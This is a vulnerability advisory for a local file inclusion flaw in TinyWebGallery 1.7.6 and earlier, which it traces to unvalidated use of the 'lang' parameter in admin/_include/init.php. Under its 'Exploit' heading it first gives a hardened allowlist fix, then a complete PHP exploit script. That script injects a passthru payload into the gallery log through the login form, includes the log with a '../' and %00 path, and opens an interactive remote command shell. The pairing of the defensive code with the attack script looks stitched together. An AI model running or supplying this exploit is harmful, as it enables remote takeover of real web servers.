Affected versions:
TinyWebGallery <= 1.7.6 LFI
Product description:
TinyWebGallery is an open-source, PHP-based photo gallery.
Vulnerability analysis:
The /admin/_include/init.php module of TinyWebGallery does not properly validate the $_GET['lang'] parameter supplied in user requests:
110. // Get Language
111. if (isset($GLOBALS['__GET']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] = $GLOBALS['__GET']["lang"];
112. elseif (isset($GLOBALS['__POST']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] = $GLOBALS['__POST']["lang"];
113. else if (isset($_SESSION["admin_lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"];
114. else $GLOBALS["language"] = $GLOBALS["default_language"];
115.
[…]
138.
139. // ------------------------------------------------------------------
140. // Necessary files
141. require _QUIXPLORER_PATH . "/_config/conf.php";
142.
143. if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php"))
144.     require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php";
145. else if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php"))
146.     require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php";
147. else
148.     require _QUIXPLORER_PATH . "/_lang/en.php";
A remote attacker can include arbitrary files through the require call on line 144. Successful exploitation requires magic_quotes_gpc = off.
Exploit:
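A hardened version of the language selection, written as an added example for this advisory rather than taken from TinyWebGallery or QuiXplorer: the request value is matched against a strict code pattern and then against an allowlist built from the files actually present in _lang/, so it is never used to build a path unless it is a known language. The stand-in _QUIXPLORER_PATH definition and the direct use of $_GET instead of the project's $GLOBALS['__GET'] wrapper are assumptions; the POST and session fallbacks of the original would be passed through the same function.

```php
<?php
// Added example, not TinyWebGallery's own code: safe replacement for the
// language handling shown above in admin/_include/init.php.

// Hypothetical stand-in for the _QUIXPLORER_PATH constant used by the project.
define('_QUIXPLORER_PATH', __DIR__);

/**
 * Build the allowlist from the language files on disk, e.g. ['de', 'en'].
 * Deriving it from the filesystem means adding a language needs no code change.
 */
function available_languages(string $langDir): array
{
    $codes = [];
    foreach (glob($langDir . '/*.php') ?: [] as $file) {
        $codes[] = basename($file, '.php');
    }
    return $codes;
}

/**
 * Resolve an untrusted request value to a language code.
 * Anything that is not a plain code present in the allowlist becomes $default.
 */
function resolve_language($requested, array $allowed, string $default): string
{
    if (!is_string($requested)) {
        return $default;
    }
    // Reject before touching the filesystem: only short letter codes with an
    // optional region suffix pass, so "../" sequences, a NUL byte (the decoded
    // form of %00) and absolute paths never reach file_exists() or require.
    if (!preg_match('/\A[a-z]{2}(?:_[a-zA-Z]{2})?\z/', $requested)) {
        return $default;
    }
    // Exact, type-strict membership check against the files that exist.
    return in_array($requested, $allowed, true) ? $requested : $default;
}

// Usage mirroring the original flow: resolve first, then build the path from
// the resolved code only. Assumes _lang/en.php exists as the default.
$allowed  = available_languages(_QUIXPLORER_PATH . '/_lang');
$language = resolve_language($_GET['lang'] ?? null, $allowed, 'en');
require _QUIXPLORER_PATH . '/_lang/' . $language . '.php';
```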
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
        die("\nsocket_create(): " . socket_strerror($s) . "\n");
    if (socket_connect($s, $host, 80) == false)
        die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
    socket_write($s, $packet, strlen($packet));
    while ($m = socket_read($s, 2048)) $response .= $m;
    socket_close($s);
    return $response;
}

function check_target()
{
    global $host, $path;
    $packet  = "GET {$path}info.php?showphpinfo=true HTTP/1.0";
    $packet .= "Host: {$host}";
    $packet .= "Connection: close";
    preg_match('/magic_quotes_gpc<\/td><td class="v">(.*)<\/td><td/', http_send($host, $packet), $match);
    if ($match[1] != "Off") die("\n[-] Exploit failed...magic_quotes_gpc = on\n");
}

function inject_code()
{
    global $host, $path;
    $code    = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
    $payload = "p_user={$code}&p_pass=";
    $packet  = "POST {$path}admin/index.php?action=login HTTP/1.0";
    $packet .= "Host: {$host}";
    $packet .= "Content-Length: ".strlen($payload)."";
    $packet .= "Content-Type: application/x-www-form-urlencoded";
    $packet .= "Connection: close";
    $packet .= $payload;
    http_send($host, $packet);
}

print "\n+-----------------------------------------------------------------------+";
print "\n| TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit by EgiX |";
print "\n+-----------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] host path\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /twg/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

check_target();
inject_code();

$packet  = "GET {$path}admin/index.php?lang=../../counter/_twg.log%%00 HTTP/1.0";
$packet .= "Host: {$host}";
$packet .= "Cmd: %s";
$packet .= "Connection: close";

while (1)
{
    print "\ntwg-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
?>
Solution:
Vendor patch:
Michael Dempfle
-------------
The vendor has released an upgrade that fixes this security issue; download it from the vendor's homepage:
http://www.tinywebgallery.com/download.php?tinywebgallery=latest